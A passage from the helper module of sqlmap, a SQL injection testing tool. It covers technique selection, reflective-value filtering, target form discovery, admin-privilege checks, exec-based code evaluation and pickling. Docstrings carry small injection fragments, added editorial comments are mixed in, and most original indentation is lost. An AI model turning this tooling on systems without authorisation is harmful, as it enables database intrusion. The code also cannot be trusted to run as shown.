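# 'Welcome, admin | Logout' collapse to 'Welcome,  | Logout', so the changing value no
# longer influences page comparison.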
def filterStringValue(value, charRegex, replacement=""):
"""
Returns string value consisting only of chars satisfying supplied
regular expression (note: it has to be in form [...])
>>> filterStringValue(u'wzydeadbeef0123#', r'[0-9a-f]')
u'deadbeef0123'
"""
retVal = value
if value:
retVal = re.sub(charRegex.replace("[", "[^") if "[^" not in charRegex else charRegex.replace("[^", "["), replacement, value)
return retVal
def filterControlChars(value):
"""
Returns string value with control chars substituted with ' '
>>> filterControlChars(u'AND 1>(2+3)\\n--')
u'AND 1>(2+3) --'
"""
return filterStringValue(value, PRINTABLE_CHAR_REGEX, ' ')
def isDBMSVersionAtLeast(version):
"""
Checks if the recognized DBMS version is at least the version
specified
"""
retVal = None
if Backend.getVersion() and Backend.getVersion() != UNKNOWN_DBMS_VERSION:
value = Backend.getVersion().replace(" ", "").rstrip('.')
while True:
index = value.find('.', value.find('.') + 1)
if index > -1:
value = value[0:index] + value[index + 1:]
else:
break
value = filterStringValue(value, '[0-9.><=]')
if isinstance(value, basestring):
if value.startswith(">="):
value = float(value.replace(">=", ""))
elif value.startswith(">"):
value = float(value.replace(">", "")) + 0.01
elif value.startswith("<="):
value = float(value.replace("<=", ""))
elif value.startswith(">"):
value = float(value.replace("<", "")) - 0.01
retVal = getUnicode(value) >= getUnicode(version)
return retVal
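# Editor's illustrative note: dots after the first one are stripped before comparison, so
# (assumed example) a fingerprinted version '5.0.38' is normalized to '5.038' and compared
# against the requested one, e.g. isDBMSVersionAtLeast('5.0'); leading operators such as
# '>=' or '>' in the banner value are folded into the number first.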
def parseSqliteTableSchema(value):
"""
Parses table column names and types from specified SQLite table schema
"""
if value:
table = {}
columns = {}
for match in re.finditer(r"(\w+)\s+(TEXT|NUMERIC|INTEGER|REAL|NONE)\b", value, re.I):
columns[match.group(1)] = match.group(2)
table[conf.tbl] = columns
kb.data.cachedColumns[conf.db] = table
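# Editor's illustrative note (assumed schema value): for
#   'CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, age NUMERIC)'
# the regex above caches {'id': 'INTEGER', 'name': 'TEXT', 'age': 'NUMERIC'} for the
# current conf.tbl under kb.data.cachedColumns[conf.db].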
def getTechniqueData(technique=None):
"""
Returns injection data for technique specified
"""
return kb.injection.data.get(technique)
def isTechniqueAvailable(technique):
"""
Returns True if there is injection data which sqlmap could use for
technique specified
"""
if conf.tech and isinstance(conf.tech, list) and technique not in conf.tech:
return False
else:
return getTechniqueData(technique) is not None
def isStackingAvailable():
"""
Returns True if a technique using stacked queries is available
"""
retVal = False
if PAYLOAD.TECHNIQUE.STACKED in kb.injection.data:
retVal = True
else:
for technique in getPublicTypeMembers(PAYLOAD.TECHNIQUE, True):
_ = getTechniqueData(technique)
if _ and "stacked" in _["title"].lower():
retVal = True
break
return retVal
def isInferenceAvailable():
"""
Returns True if any technique using inference is available
"""
return any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.BOOLEAN, PAYLOAD.TECHNIQUE.STACKED, PAYLOAD.TECHNIQUE.TIME))
def setOptimize():
"""
Sets options turned on by switch '-o'
"""
#conf.predictOutput = True
conf.keepAlive = True
conf.threads = 3 if conf.threads < 3 else conf.threads
conf.nullConnection = not any((conf.data, conf.textOnly, conf.titles, conf.string, conf.notString, conf.regexp, conf.tor))
if not conf.nullConnection:
debugMsg = "turning off --null-connection switch used indirectly by switch -o"
logger.debug(debugMsg)
def initTechnique(technique=None):
"""
Prepares data for technique specified
"""
try:
data = getTechniqueData(technique)
resetCounter(technique)
if data:
kb.pageTemplate, kb.errorIsNone = getPageTemplate(data.templatePayload, kb.injection.place)
kb.matchRatio = data.matchRatio
kb.negativeLogic = (technique == PAYLOAD.TECHNIQUE.BOOLEAN) and (data.where == PAYLOAD.WHERE.NEGATIVE)
# Restoring stored conf options
for key, value in kb.injection.conf.items():
if value and (not hasattr(conf, key) or (hasattr(conf, key) and not getattr(conf, key))):
setattr(conf, key, value)
debugMsg = "resuming configuration option '%s' (%s)" % (key, value)
logger.debug(debugMsg)
if value and key == "optimize":
setOptimize()
else:
warnMsg = "there is no injection data available for technique "
warnMsg += "'%s'" % enumValueToNameLookup(PAYLOAD.TECHNIQUE, technique)
logger.warn(warnMsg)
except SqlmapDataException:
errMsg = "missing data in old session file(s). "
errMsg += "Please use '--flush-session' to deal "
errMsg += "with this error"
raise SqlmapNoneDataException(errMsg)
def arrayizeValue(value):
"""
Makes a list out of value if it is not already a list or tuple itself
>>> arrayizeValue(u'1')
[u'1']
"""
if not isListLike(value):
value = [value]
return value
def unArrayizeValue(value):
"""
Makes a value out of iterable if it is a list or tuple itself
>>> unArrayizeValue([u'1'])
u'1'
"""
if isListLike(value):
value = value[0] if len(value) > 0 else None
return value
def flattenValue(value):
"""
Returns an iterator representing flat representation of a given value
>>> [_ for _ in flattenValue([[u'1'], [[u'2'], u'3']])]
[u'1', u'2', u'3']
"""
for i in iter(value):
if isListLike(i):
for j in flattenValue(i):
yield j
else:
yield i
def isListLike(value):
"""
Returns True if the given value is a list-like instance
>>> isListLike([1, 2, 3])
True
>>> isListLike(u'2')
False
"""
return isinstance(value, (list, tuple, set, BigArray))
def getSortedInjectionTests():
"""
Returns the test list prioritized by the DBMS(es) possibly detected from error
messages
"""
retVal = copy.deepcopy(conf.tests)
def priorityFunction(test):
retVal = SORT_ORDER.FIRST
if test.stype == PAYLOAD.TECHNIQUE.UNION:
retVal = SORT_ORDER.LAST
elif 'details' in test and 'dbms' in test.details:
if test.details.dbms in Backend.getErrorParsedDBMSes():
retVal = SORT_ORDER.SECOND
else:
retVal = SORT_ORDER.THIRD
return retVal
if Backend.getErrorParsedDBMSes():
retVal = sorted(retVal, key=priorityFunction)
return retVal
def filterListValue(value, regex):
"""
Returns list with items that have parts satisfying given regular
expression
>>> filterListValue(['users', 'admins', 'logs'], r'(users|admins)')
['users', 'admins']
"""
if isinstance(value, list) and regex:
retVal = filter(lambda _: re.search(regex, _, re.I), value)
else:
retVal = value
return retVal
def showHttpErrorCodes():
"""
    Shows all HTTP error codes raised so far
"""
if kb.httpErrorCodes:
warnMsg = "HTTP error codes detected during run:\n"
warnMsg += ", ".join("%d (%s) - %d times" % (code, httplib.responses[code] \
if code in httplib.responses else '?', count) \
for code, count in kb.httpErrorCodes.items())
logger.warn(warnMsg)
def openFile(filename, mode='r'):
"""
Returns file handle of a given filename
"""
try:
return codecs.open(filename, mode, UNICODE_ENCODING, "replace")
except IOError:
errMsg = "there has been a file opening error for filename '%s'. " % filename
errMsg += "Please check %s permissions on a file " % ("write" if \
mode and ('w' in mode or 'a' in mode or '+' in mode) else "read")
errMsg += "and that it's not locked by another process."
raise SqlmapFilePathException(errMsg)
def decodeIntToUnicode(value):
"""
    Decodes an inferred integer value to a unicode character
>>> decodeIntToUnicode(35)
u'#'
>>> decodeIntToUnicode(64)
u'@'
"""
retVal = value
if isinstance(value, int):
try:
if value > 255:
_ = "%x" % value
if len(_) % 2 == 1:
_ = "0%s" % _
retVal = getUnicode(hexdecode(_), encoding="UTF-16" if Backend.isDbms(DBMS.MSSQL) else None)
else:
retVal = getUnicode(chr(value))
except:
retVal = INFERENCE_UNKNOWN_CHAR
return retVal
def unhandledExceptionMessage():
"""
    Returns a detailed message about the unhandled exception that occurred
"""
errMsg = "unhandled exception occurred in %s. It is recommended to retry your " % VERSION_STRING
errMsg += "run with the latest development version from official GitHub "
errMsg += "repository at '%s'. If the exception persists, please open a new issue " % GIT_PAGE
errMsg += "at '%s' (or less preferably send by e-mail to '%s') " % (ISSUES_PAGE, ML)
errMsg += "with the following text and any other information required to "
errMsg += "reproduce the bug. The "
errMsg += "developers will try to reproduce the bug, fix it accordingly "
errMsg += "and get back to you\n"
errMsg += "sqlmap version: %s%s\n" % (VERSION, "-%s" % REVISION if REVISION else "")
errMsg += "Python version: %s\n" % PYVERSION
errMsg += "Operating system: %s\n" % PLATFORM
errMsg += "Command line: %s\n" % re.sub(r".+?\bsqlmap.py\b", "sqlmap.py", " ".join(sys.argv))
errMsg += "Technique: %s\n" % (enumValueToNameLookup(PAYLOAD.TECHNIQUE, kb.technique) if kb.get("technique") else ("DIRECT" if conf.get("direct") else None))
errMsg += "Back-end DBMS: %s" % ("%s (fingerprinted)" % Backend.getDbms() if Backend.getDbms() is not None else "%s (identified)" % Backend.getIdentifiedDbms())
return errMsg
def createGithubIssue(errMsg, excMsg):
"""
Automatically create a Github issue with unhandled exception information
"""
msg = "\ndo you want to automatically create a new (anonymized) issue "
msg += "with the unhandled exception information at "
msg += "the official Github repository? [y/N] "
try:
test = readInput(msg, default="N")
except:
test = None
if test and test[0] in ("y", "Y"):
ex = None
errMsg = errMsg[errMsg.find("\n"):]
data = {"title": "Unhandled exception (#%s)" % hashlib.md5(excMsg).hexdigest()[:8], "body": "```%s\n```\n```\n%s```" % (errMsg, excMsg)}
req = urllib2.Request(url="https://api.github.com/repos/sqlmapproject/sqlmap/issues", data=json.dumps(data), headers={"Authorization": "token %s" % GITHUB_REPORT_OAUTH_TOKEN})
try:
f = urllib2.urlopen(req)
content = f.read()
except Exception, ex:
content = None
issueUrl = re.search(r"https://github.com/sqlmapproject/sqlmap/issues/\d+", content or "")
if issueUrl:
infoMsg = "created Github issue can been found at the address '%s'" % issueUrl.group(0)
logger.info(infoMsg)
else:
warnMsg = "something went wrong while creating a Github issue"
if ex:
warnMsg += " ('%s')" % ex
logger.warn(warnMsg)
def maskSensitiveData(msg):
"""
Masks sensitive data in the supplied message
"""
retVal = getUnicode(msg)
for item in filter(None, map(lambda x: conf.get(x), ("hostname", "googleDork", "authCred", "proxyCred", "tbl", "db", "col", "user", "cookie", "proxy"))):
regex = SENSITIVE_DATA_REGEX % re.sub("(\W)", r"\\\1", getUnicode(item))
while extractRegexResult(regex, retVal):
value = extractRegexResult(regex, retVal)
retVal = retVal.replace(value, '*' * len(value))
if getpass.getuser():
retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), "*" * len(getpass.getuser()), retVal)
return retVal
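# Hedged usage sketch (added; not part of the original module). Assuming a
# hypothetical run where conf.hostname is "target.local", any occurrence of
# that value (and of the current OS username) in a log message is blotted out
# with '*' characters of the same length:
def _exampleMaskSensitiveData():
    # e.g. u"connecting to ************ as *****" for OS user "alice"
    return maskSensitiveData("connecting to target.local as alice")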
def listToStrValue(value):
"""
Flattens list to a string value
>>> listToStrValue([1,2,3])
'1, 2, 3'
"""
if isinstance(value, (set, tuple)):
value = list(value)
if isinstance(value, list):
retVal = value.__str__().lstrip('[').rstrip(']')
else:
retVal = value
return retVal
def getExceptionFrameLocals():
"""
Returns dictionary with local variable content from frame
where exception has been raised
"""
retVal = {}
if sys.exc_info():
trace = sys.exc_info()[2]
while trace.tb_next:
trace = trace.tb_next
retVal = trace.tb_frame.f_locals
return retVal
def intersect(valueA, valueB, lowerCase=False):
"""
Returns intersection of the array-ized values
>>> intersect([1, 2, 3], set([1,3]))
[1, 3]
"""
retVal = []
if valueA and valueB:
valueA = arrayizeValue(valueA)
valueB = arrayizeValue(valueB)
if lowerCase:
valueA = [val.lower() if isinstance(val, basestring) else val for val in valueA]
valueB = [val.lower() if isinstance(val, basestring) else val for val in valueB]
retVal = [val for val in valueA if val in valueB]
return retVal
def cpuThrottle(value):
"""
    Throttles the CPU to reduce its consumption
"""
delay = 0.00001 * (value ** 2)
time.sleep(delay)
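# Illustrative note (added): the sleep grows quadratically with the supplied
# value, e.g. a hypothetical value of 50 sleeps 0.00001 * 50 ** 2 = 0.025
# seconds per call, while 100 sleeps 0.1 seconds per call.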
def removeReflectiveValues(content, payload, suppressWarning=False):
"""
Neutralizes reflective values in a given content based on a payload
(e.g. ..search.php?q=1 AND 1=2 --> "...searching for <b>1%20AND%201%3D2</b>..." --> "...searching for <b>__REFLECTED_VALUE__</b>...")
"""
retVal = content
if all([content, payload]) and isinstance(content, unicode) and kb.reflectiveMechanism and not kb.heuristicMode:
def _(value):
while 2 * REFLECTED_REPLACEMENT_REGEX in value:
value = value.replace(2 * REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX)
return value
payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ''), convall=True))
regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape")))
if regex != payload:
if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check
parts = regex.split(REFLECTED_REPLACEMENT_REGEX)
retVal = content.replace(payload, REFLECTED_VALUE_MARKER) # dummy approach
if len(parts) > REFLECTED_MAX_REGEX_PARTS: # preventing CPU hogs
regex = _("%s%s%s" % (REFLECTED_REPLACEMENT_REGEX.join(parts[:REFLECTED_MAX_REGEX_PARTS / 2]), REFLECTED_REPLACEMENT_REGEX, REFLECTED_REPLACEMENT_REGEX.join(parts[-REFLECTED_MAX_REGEX_PARTS / 2:])))
parts = filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))
if regex.startswith(REFLECTED_REPLACEMENT_REGEX):
regex = r"%s%s" % (REFLECTED_BORDER_REGEX, regex[len(REFLECTED_REPLACEMENT_REGEX):])
else:
regex = r"\b%s" % regex
if regex.endswith(REFLECTED_REPLACEMENT_REGEX):
regex = r"%s%s" % (regex[:-len(REFLECTED_REPLACEMENT_REGEX)], REFLECTED_BORDER_REGEX)
else:
regex = r"%s\b" % regex
retVal = re.sub(r"(?i)%s" % regex, REFLECTED_VALUE_MARKER, retVal)
if len(parts) > 2:
regex = REFLECTED_REPLACEMENT_REGEX.join(parts[1:])
retVal = re.sub(r"(?i)\b%s\b" % regex, REFLECTED_VALUE_MARKER, retVal)
if retVal != content:
kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT] += 1
if not suppressWarning:
warnMsg = "reflective value(s) found and filtering out"
singleTimeWarnMessage(warnMsg)
if re.search(r"FRAME[^>]+src=[^>]*%s" % REFLECTED_VALUE_MARKER, retVal, re.I):
warnMsg = "frames detected containing attacked parameter values. Please be sure to "
warnMsg += "test those separately in case that attack on this page fails"
singleTimeWarnMessage(warnMsg)
elif not kb.testMode and not kb.reflectiveCounters[REFLECTIVE_COUNTER.HIT]:
kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] += 1
if kb.reflectiveCounters[REFLECTIVE_COUNTER.MISS] > REFLECTIVE_MISS_THRESHOLD:
kb.reflectiveMechanism = False
if not suppressWarning:
debugMsg = "turning off reflection removal mechanism (for optimization purposes)"
logger.debug(debugMsg)
return retVal
def normalizeUnicode(value):
"""
Does an ASCII normalization of unicode strings
Reference: http://www.peterbe.com/plog/unicode-to-ascii
>>> normalizeUnicode(u'\u0161u\u0107uraj')
'sucuraj'
"""
return unicodedata.normalize('NFKD', value).encode('ascii', 'ignore') if isinstance(value, unicode) else value
def safeSQLIdentificatorNaming(name, isTable=False):
"""
Returns a safe representation of SQL identificator name (internal data format)
Reference: http://stackoverflow.com/questions/954884/what-special-characters-are-allowed-in-t-sql-column-retVal
"""
retVal = name
if isinstance(name, basestring):
retVal = getUnicode(name)
_ = isTable and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE)
if _:
retVal = re.sub(r"(?i)\A%s\." % DEFAULT_MSSQL_SCHEMA, "", retVal)
if retVal.upper() in kb.keywords or (retVal or " ")[0].isdigit() or not re.match(r"\A[A-Za-z0-9_@%s\$]+\Z" % ("." if _ else ""), retVal): # MsSQL is the only DBMS where we automatically prepend schema to table name (dot is normal)
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = "`%s`" % retVal.strip("`")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
retVal = "\"%s\"" % retVal.strip("\"")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = "\"%s\"" % retVal.strip("\"").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,) and not re.match(r"\A\w+\Z", retVal, re.U):
retVal = "[%s]" % retVal.strip("[]")
if _ and DEFAULT_MSSQL_SCHEMA not in retVal and '.' not in re.sub(r"\[[^]]+\]", "", retVal):
retVal = "%s.%s" % (DEFAULT_MSSQL_SCHEMA, retVal)
return retVal
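# Hedged examples (added for illustration; the actual result depends on the
# back-end DBMS identified at runtime and on kb.keywords):
#   MySQL/Access:     "select"      -> "`select`"       (backtick quoting)
#   PostgreSQL/DB2:   "select"      -> '"select"'       (double-quote quoting)
#   Oracle:           "select"      -> '"SELECT"'       (quoted and upper-cased)
#   MSSQL (isTable):  "users table" -> "dbo.[users table]" (bracket quoting,
#                     default schema prepended when missing)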
def unsafeSQLIdentificatorNaming(name):
"""
Extracts identificator's name from its safe SQL representation
"""
retVal = name
if isinstance(name, basestring):
if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.ACCESS):
retVal = name.replace("`", "")
elif Backend.getIdentifiedDbms() in (DBMS.PGSQL, DBMS.DB2):
retVal = name.replace("\"", "")
elif Backend.getIdentifiedDbms() in (DBMS.ORACLE,):
retVal = name.replace("\"", "").upper()
elif Backend.getIdentifiedDbms() in (DBMS.MSSQL,):
retVal = name.replace("[", "").replace("]", "")
if Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.SYBASE):
prefix = "%s." % DEFAULT_MSSQL_SCHEMA
if retVal.startswith(prefix):
retVal = retVal[len(prefix):]
return retVal
def isNoneValue(value):
"""
Returns whether the value is unusable (None or '')
>>> isNoneValue(None)
True
>>> isNoneValue('None')
True
>>> isNoneValue('')
True
>>> isNoneValue([])
True
>>> isNoneValue([2])
False
"""
if isinstance(value, basestring):
return value in ("None", "")
elif isListLike(value):
return all(isNoneValue(_) for _ in value)
elif isinstance(value, dict):
return not any(value)
else:
return value is None
def isNullValue(value):
"""
Returns whether the value contains explicit 'NULL' value
>>> isNullValue(u'NULL')
True
>>> isNullValue(u'foobar')
False
"""
return isinstance(value, basestring) and value.upper() == NULL
def expandMnemonics(mnemonics, parser, args):
"""
Expands mnemonic options
"""
class MnemonicNode(object):
def __init__(self):
self.next = {}
self.current = []
head = MnemonicNode()
pointer = None
for group in parser.option_groups:
for option in group.option_list:
for opt in option._long_opts + option._short_opts:
pointer = head
for char in opt:
if char == "-":
continue
elif char not in pointer.next:
pointer.next[char] = MnemonicNode()
pointer = pointer.next[char]
pointer.current.append(option)
for mnemonic in mnemonics.split(','):
found = None
name = mnemonic.split('=')[0].replace("-", "").strip()
value = mnemonic.split('=')[1] if len(mnemonic.split('=')) > 1 else None
pointer = head
for char in name:
if char in pointer.next:
pointer = pointer.next[char]
else:
pointer = None
break
if pointer in (None, head):
errMsg = "mnemonic '%s' can't be resolved to any parameter name" % name
raise SqlmapSyntaxException(errMsg)
elif len(pointer.current) > 1:
options = {}
for option in pointer.current:
for opt in option._long_opts + option._short_opts:
opt = opt.strip('-')
if opt.startswith(name):
options[opt] = option
if name in options:
found = name
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
logger.debug(debugMsg)
else:
found = sorted(options.keys(), key=lambda x: len(x))[0]
warnMsg = "detected ambiguity (mnemonic '%s' can be resolved to: %s). " % (name, ", ".join("'%s'" % key for key in options.keys()))
warnMsg += "Resolved to shortest of those ('%s')" % found
logger.warn(warnMsg)
found = options[found]
else:
found = pointer.current[0]
debugMsg = "mnemonic '%s' resolved to %s). " % (name, found)
logger.debug(debugMsg)
if found:
try:
value = found.convert_value(found, value)
except OptionValueError:
value = None
if value is not None:
setattr(args, found.dest, value)
elif not found.type: # boolean
setattr(args, found.dest, True)
else:
errMsg = "mnemonic '%s' requires value of type '%s'" % (name, found.type)
raise SqlmapSyntaxException(errMsg)
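# Hedged illustration (added): with a hypothetical invocation such as
# -z "flu,bat,ban,tec=EU", each comma-separated token is walked through the
# prefix tree built above, e.g. "flu" resolves to --flush-session, "bat" to
# --batch, "ban" to --banner and "tec=EU" to --technique with the value "EU".
# Ambiguous prefixes resolve to the shortest matching option name (a warning
# is logged), while unresolvable ones raise SqlmapSyntaxException.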
def safeCSValue(value):
"""
Returns value safe for CSV dumping
Reference: http://tools.ietf.org/html/rfc4180
>>> safeCSValue(u'foo, bar')
u'"foo, bar"'
>>> safeCSValue(u'foobar')
u'foobar'
"""
retVal = value
if retVal and isinstance(retVal, basestring):
if not (retVal[0] == retVal[-1] == '"'):
if any(_ in retVal for _ in (conf.get("csvDel", defaults.csvDel), '"', '\n')):
retVal = '"%s"' % retVal.replace('"', '""')
return retVal
def filterPairValues(values):
"""
Returns only list-like values with length 2
>>> filterPairValues([[1, 2], [3], 1, [4, 5]])
[[1, 2], [4, 5]]
"""
retVal = []
if not isNoneValue(values) and hasattr(values, '__iter__'):
retVal = filter(lambda x: isinstance(x, (tuple, list, set)) and len(x) == 2, values)
return retVal
def randomizeParameterValue(value):
"""
    Randomizes a parameter value based on occurrences of alphanumeric characters
>>> random.seed(0)
>>> randomizeParameterValue('foobar')
'rnvnav'
>>> randomizeParameterValue('17')
'83'
"""
retVal = value
for match in re.finditer('[A-Z]+', value):
retVal = retVal.replace(match.group(), randomStr(len(match.group())).upper())
for match in re.finditer('[a-z]+', value):
retVal = retVal.replace(match.group(), randomStr(len(match.group())).lower())
for match in re.finditer('[0-9]+', value):
retVal = retVal.replace(match.group(), str(randomInt(len(match.group()))))
return retVal
def asciifyUrl(url, forceQuote=False):
"""
    Attempts to make a unicode URL usable with ``urllib/urllib2``.
    More specifically, it attempts to convert the unicode object ``url``,
    which is meant to represent an IRI, to a unicode object that,
    containing only ASCII characters, is a valid URI. This involves:
* IDNA/Puny-encoding the domain name.
* UTF8-quoting the path and querystring parts.
See also RFC 3987.
Reference: http://blog.elsdoerfer.name/2008/12/12/opening-iris-in-python/
>>> asciifyUrl(u'http://www.\u0161u\u0107uraj.com')
u'http://www.xn--uuraj-gxa24d.com'
"""
parts = urlparse.urlsplit(url)
if not parts.scheme or not parts.netloc:
        # apparently not a URL
return url
if all(char in string.printable for char in url):
return url
# idna-encode domain
hostname = parts.hostname.encode("idna")
    # UTF8-quote the other parts. We check each part individually to see
    # if it needs to be quoted - that should catch some additional user
# errors, say for example an umlaut in the username even though
# the path *is* already quoted.
def quote(s, safe):
s = s or ''
# Triggers on non-ascii characters - another option would be:
# urllib.quote(s.replace('%', '')) != s.replace('%', '')
# which would trigger on all %-characters, e.g. "&".
if s.encode("ascii", "replace") != s or forceQuote:
return urllib.quote(s.encode(UNICODE_ENCODING), safe=safe)
return s
username = quote(parts.username, '')
password = quote(parts.password, safe='')
path = quote(parts.path, safe='/')
query = quote(parts.query, safe="&=")
# put everything back together
netloc = hostname
if username or password:
netloc = '@' + netloc
if password:
netloc = ':' + password + netloc
netloc = username + netloc
if parts.port:
netloc += ':' + str(parts.port)
return urlparse.urlunsplit([parts.scheme, netloc, path, query, parts.fragment])
def isAdminFromPrivileges(privileges):
"""
    Inspects privileges to see if those are coming from an admin user
"""
# In PostgreSQL the usesuper privilege means that the
# user is DBA
retVal = (Backend.isDbms(DBMS.PGSQL) and "super" in privileges)
# In Oracle the DBA privilege means that the
# user is DBA
retVal |= (Backend.isDbms(DBMS.ORACLE) and "DBA" in privileges)
# In MySQL >= 5.0 the SUPER privilege means
# that the user is DBA
retVal |= (Backend.isDbms(DBMS.MYSQL) and kb.data.has_information_schema and "SUPER" in privileges)
# In MySQL < 5.0 the super_priv privilege means
# that the user is DBA
retVal |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema and "super_priv" in privileges)
# In Firebird there is no specific privilege that means
# that the user is DBA
# TODO: confirm
retVal |= (Backend.isDbms(DBMS.FIREBIRD) and all(_ in privileges for _ in ("SELECT", "INSERT", "UPDATE", "DELETE", "REFERENCES", "EXECUTE")))
return retVal
def findPageForms(content, url, raise_=False, addToTargets=False):
"""
Parses given page content for possible forms
"""
class _(StringIO):
def __init__(self, content, url):
StringIO.__init__(self, unicodeencode(content, kb.pageEncoding) if isinstance(content, unicode) else content)
self._url = url
def geturl(self):
return self._url
if not content:
errMsg = "can't parse forms as the page content appears to be blank"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
forms = None
retVal = set()
response = _(content, url)
try:
forms = ParseResponse(response, backwards_compat=False)
except UnicodeError:
pass
except ParseError:
warnMsg = "badly formed HTML at the given URL ('%s'). Going to filter it" % url
logger.warning(warnMsg)
response.seek(0)
filtered = _("".join(re.findall(FORM_SEARCH_REGEX, response.read())), response.geturl())
try:
forms = ParseResponse(filtered, backwards_compat=False)
except ParseError:
errMsg = "no success"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
if forms:
for form in forms:
try:
for control in form.controls:
if hasattr(control, "items") and not control.disabled:
# if control has selectable items select first non-disabled
for item in control.items:
if not item.disabled:
if not item.selected:
item.selected = True
break
request = form.click()
except (ValueError, TypeError), ex:
errMsg = "there has been a problem while "
errMsg += "processing page forms ('%s')" % ex
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
else:
url = urldecode(request.get_full_url(), kb.pageEncoding)
method = request.get_method()
data = request.get_data() if request.has_data() else None
data = urldecode(data, kb.pageEncoding, plusspace=False)
if not data and method and method.upper() == HTTPMETHOD.POST:
debugMsg = "invalid POST form with blank data detected"
logger.debug(debugMsg)
continue
target = (url, method, data, conf.cookie, None)
retVal.add(target)
else:
errMsg = "there were no forms found at the given target URL"
if raise_:
raise SqlmapGenericException(errMsg)
else:
logger.debug(errMsg)
if addToTargets and retVal:
for target in retVal:
url = target[0]
# flag to know if we are dealing with the same target host
_ = reduce(lambda x, y: x == y, map(lambda x: urlparse.urlparse(x).netloc.split(':')[0], (response.geturl(), url)))
if conf.scope:
if not re.search(conf.scope, url, re.I):
continue
elif not _:
continue
kb.targets.add(target)
return retVal
def getHostHeader(url):
"""
Returns proper Host header value for a given target URL
>>> getHostHeader('http://www.target.com/vuln.php?id=1')
'www.target.com'
"""
retVal = url
if url:
retVal = urlparse.urlparse(url).netloc
if re.search("http(s)?://\[.+\]", url, re.I):
retVal = extractRegexResult("http(s)?://\[(?P<result>.+)\]", url)
elif any(retVal.endswith(':%d' % _) for _ in (80, 443)):
retVal = retVal.split(':')[0]
return retVal
def checkDeprecatedOptions(args):
"""
Checks for deprecated options
"""
for _ in args:
if _ in DEPRECATED_OPTIONS:
errMsg = "switch/option '%s' is deprecated" % _
if DEPRECATED_OPTIONS[_]:
errMsg += " (hint: %s)" % DEPRECATED_OPTIONS[_]
raise SqlmapSyntaxException(errMsg)
def checkSystemEncoding():
"""
Checks for problematic encodings
"""
if sys.getdefaultencoding() == "cp720":
try:
codecs.lookup("cp720")
except LookupError:
errMsg = "there is a known Python issue (#1616979) related "
errMsg += "to support for charset 'cp720'. Please visit "
errMsg += "'http://blog.oneortheother.info/tip/python-fix-cp720-encoding/index.html' "
errMsg += "and follow the instructions to be able to fix it"
logger.critical(errMsg)
warnMsg = "temporary switching to charset 'cp1256'"
logger.warn(warnMsg)
reload(sys)
sys.setdefaultencoding("cp1256")
def evaluateCode(code, variables=None):
"""
    Executes given Python code (passed in string form)
"""
try:
exec(code, variables)
except KeyboardInterrupt:
raise
except Exception, ex:
errMsg = "an error occurred while evaluating provided code ('%s'). " % ex
raise SqlmapGenericException(errMsg)
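# Hedged usage sketch (added; not part of the original module): evaluateCode()
# is a thin wrapper around exec(), so passing a dict makes the executed code
# read from and write into that dict:
def _exampleEvaluateCode():
    variables = {"id": 1}
    evaluateCode("id += 1; result = id * 10", variables)
    return variables["result"]  # 20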
def serializeObject(object_):
"""
Serializes given object
"""
return base64pickle(object_)
def unserializeObject(value):
"""
Unserializes object from given serialized form
>>> unserializeObject(serializeObject([1, 2, 3])) == [1, 2, 3]
True
"""
return base64unpickle(value) if value else None
def resetCounter(technique):
"""
Resets query counter for a given technique
"""
kb.counters[technique] = 0
def incrementCounter(technique):
"""
Increments query counter for a given technique
"""
kb.counters[technique] = getCounter(technique) + 1
def getCounter(technique):
"""
Returns query counter for a given technique
"""
return kb.counters.get(technique, 0)
def applyFunctionRecursively(value, function):
"""
Applies function recursively through list-like structures
>>> applyFunctionRecursively([1, 2, [3, 4, [19]], -9], lambda _: _ > 0)
[True, True, [True, True, [True]], False]
"""
if isListLike(value):
retVal = [applyFunctionRecursively(_, function) for _ in value]
else:
retVal = function(value)
return retVal
def decodeHexValue(value):
"""
Returns value decoded from DBMS specific hexadecimal representation
>>> decodeHexValue('3132332031')
u'123 1'
"""
retVal = value
def _(value):
retVal = value
if value and isinstance(value, basestring) and len(value) % 2 == 0:
retVal = hexdecode(retVal)
if not kb.binaryField:
if Backend.isDbms(DBMS.MSSQL) and value.startswith("0x"):
try:
retVal = retVal.decode("utf-16-le")
except UnicodeDecodeError:
pass
elif Backend.isDbms(DBMS.HSQLDB):
try:
retVal = retVal.decode("utf-16-be")
except UnicodeDecodeError:
pass
if not isinstance(retVal, unicode):
retVal = getUnicode(retVal, "utf8")
return retVal
try:
retVal = applyFunctionRecursively(value, _)
except:
singleTimeWarnMessage("there was a problem decoding value '%s' from expected hexadecimal form" % value)
return retVal
def extractExpectedValue(value, expected):
"""
Extracts and returns expected value by a given type
>>> extractExpectedValue(['1'], EXPECTED.BOOL)
True
>>> extractExpectedValue('1', EXPECTED.INT)
1
"""
if expected:
value = unArrayizeValue(value)
if isNoneValue(value):
value = None
elif expected == EXPECTED.BOOL:
if isinstance(value, int):
value = bool(value)
elif isinstance(value, basestring):
value = value.strip().lower()
if value in ("true", "false"):
value = value == "true"
elif value in ("1", "-1"):
value = True
elif value == "0":
value = False
else:
value = None
elif expected == EXPECTED.INT:
if isinstance(value, basestring):
value = int(value) if value.isdigit() else None
return value
def hashDBWrite(key, value, serialize=False):
